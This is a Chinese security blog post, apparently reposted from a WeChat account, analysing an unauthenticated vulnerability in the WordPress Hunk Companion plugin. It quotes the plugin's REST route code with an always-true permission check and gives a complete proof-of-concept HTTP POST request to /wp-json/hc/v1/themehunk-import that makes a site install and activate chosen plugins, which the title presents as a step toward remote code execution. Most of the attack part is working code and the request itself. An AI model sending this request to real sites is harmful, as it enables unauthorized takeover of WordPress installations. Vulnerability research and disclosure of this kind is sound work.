0x00 前言
0x01 漏洞分析&复现
publicfunctionregister_routes(){
register_rest_route( 'hc/v1', 'themehunk-import', array(
'methods' => 'POST',
'callback' => array( $this, 'tp_install' ),
'permission_callback' => '__return_true',
) );
register_rest_route( 'ai/v1', 'ai-site-import', array(
'methods' => 'POST',
'callback' => array( $this, 'data_import' ),
'login_user_id' => get_current_user_id(),
'permission_callback' => '__return_true',
) );
}
publicfunctiontp_install(WP_REST_Request $request){
$request = $request->get_params();
$params = $request['params'];
new HUNK_COMPANION_SITES_BUILDER_SETUP($params);
return json_encode( site_url());
}
classHUNK_COMPANION_SITES_BUILDER_SETUP{
function__construct($params)
{
// wp_send_json_success( $params );
self::init_admin_settings($params);
}
staticpublicfunctiongetFileUrl(){
// If the function it's not available, require it.
if ( ! function_exists( 'download_url' ) ) {
require_once ABSPATH . 'wp-admin/includes/file.php';
}
}
/**
* Admin settings init
*/
staticpublicfunctioninit_admin_settings($params){
$installplugin = $params['plugin'];
$allplugins = $params['allPlugins'][0]; // all plugin slug
$theme_slug = $params['themeSlug']; // plugin slug
$proThemePlugin = $params['proThemePlugin']; // free or pro theme plugin name
$templateType = $params['templateType']; // template type free or pro
$tmplFreePro = $params['tmplFreePro']; // pro template type theme or plugin
$wpDownloadUrl = $params['wpUrl'];
$localPlugin = $localTheme = true;
if($templateType==='free'){
// $installplugin[$proThemePlugin]= esc_html('Themehunk Plugins');
}elseif($templateType==='paid' && $tmplFreePro==='theme'){
$theme_slug = $proThemePlugin;
$localTheme= false;
}elseif($templateType==='paid' && $tmplFreePro==='plugin'){
$installplugin[$proThemePlugin]= esc_html('Premium Plugins');
$localPlugin= false;
}
// self::theme_install($theme_slug,$localTheme,$wpDownloadUrl);
self::plugin_install($installplugin,$allplugins,$localPlugin);
}
staticpublicfunctionplugin_install($plugin,$allplugins,$localPlugin){
foreach($plugin as $slug => $value){
$init = $allplugins[$slug];
if(self::is_plugin_installed_check($init)){
if(self::is_plugin_active_check($init)){
}else{
// plugin activation code
activate_plugin( $init );
}
}else{
//plugin install and acitvation code
self::init_plugin($slug,$init,$localPlugin);
}
}
}POST /wp-json/hc/v1/themehunk-import HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/themes.php?page=themehunk-site-library&template=step
Content-Type: application/json
Content-Length: 2942
Origin: http://kubernetes.docker.internal
Connection: keep-alive
{
"params": {
"templateType": "free",
"plugin": {
"lead-form-builder": "Lead Form Builder",
"woocommerce": "Woocommerce"
},
"allPlugins": [
{
"woocommerce": "woocommerce/woocommerce.php",
"unlimited-blocks": "unlimited-blocks/unlimited-blocks.php",
"elementor": "elementor/elementor.php",
"pagelayer": "pagelayer/pagelayer.php",
"brizy": "brizy/brizy.php",
"megamenu": "megamenu/megamenu.php",
"wc-multivendor-membership": "wc-multivendor-membership/wc-multivendor-membership.php",
"wc-multivendor-marketplace": "wc-multivendor-marketplace/wc-multivendor-marketplace.php",
"wc-frontend-manager": "wc-frontend-manager/wc_frontend_manager.php",
"getwid": "getwid/getwid.php",
"th-advance-product-search": "th-advance-product-search/th-advance-product-search.php",
"th-all-in-one-woo-cart": "th-all-in-one-woo-cart/th-all-in-one-woo-cart.php",
"th-product-compare": "th-product-compare/th-product-compare.php",
"beaver-builder-lite-version": "beaver-builder-lite-version/fl-builder.php",
"contact-form-7": "contact-form-7/wp-contact-form-7.php",
"lead-form-builder": "lead-form-builder/lead-form-builder.php",
"wp-popup-builder": "wp-popup-builder/wp-popup-builder.php",
"motopress-hotel-booking-lite": "motopress-hotel-booking-lite/motopress-hotel-booking.php",
"real-estate-listing-realtyna-wpl": "real-estate-listing-realtyna-wpl/WPL.php",
"bmi-calculator-shortcode": "bmi-calculator-shortcode/bmi-calculator-shortcode.php",
"yith-woocommerce-wishlist": "yith-woocommerce-wishlist/init.php",
"yith-woocommerce-compare": "yith-woocommerce-compare/init.php",
"give": "give/give.php",
"restaurant-cafe-addon-for-elementor": "restaurant-cafe-addon-for-elementor/restaurant-cafe-addon-for-elementor.php",
"dokan-lite": "dokan-lite/dokan.php",
"easy-appointments": "easy-appointments/main.php",
"woocommerce-conversion-tracking": "woocommerce-conversion-tracking/conversion-tracking.php",
"mage-eventpress": "mage-eventpress/woocommerce-event-press.php",
"dc-woocommerce-multi-vendor": "dc-woocommerce-multi-vendor/dc_product_vendor.php",
"affiliate-coupons": "affiliate-coupons/affiliate-coupons.php",
"wemail": "wemail/wemail.php",
"charitable": "charitable/charitable.php",
"rencontre": "rencontre/rencontre.php",
"easy-property-listings": "easy-property-listings/easy-property-listings.php",
"ecalypse-rental-starter": "ecalypse-rental-starter/ecalypse-rental-starter.php",
"cryptocurrency-price-ticker-widget": "cryptocurrency-price-ticker-widget/cryptocurrency-price-ticker-widget.php",
"animentor-lottie-bodymovin-elementor": "animentor-lottie-bodymovin-elementor/animentor-lottie-bodymovin-elementor.php",
"tickera-event-ticketing-system": "tickera-event-ticketing-system/tickera.php",
"ymm-search": "ymm-search/ymm-search.php",
"themehunk-customizer": "themehunk-customizer/themehunk-customizer.php",
"hunk-companion": "hunk-companion/hunk-companion.php"
}
],
"builder": "gogo",
"themeSlug": "gogo",
"proThemePlugin": "hunk-companion",
"tmplFreePro": "plugin",
"wpUrl": "https://downloads.wordpress.org/",
"thUrl": "https://themehunk.com/wp/data/"
}
}
原文始发于微信公众号(星悦安全):【首发1day】WordPress Hunk Companion插件存在前台组合拳RCE漏洞 (附poc)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论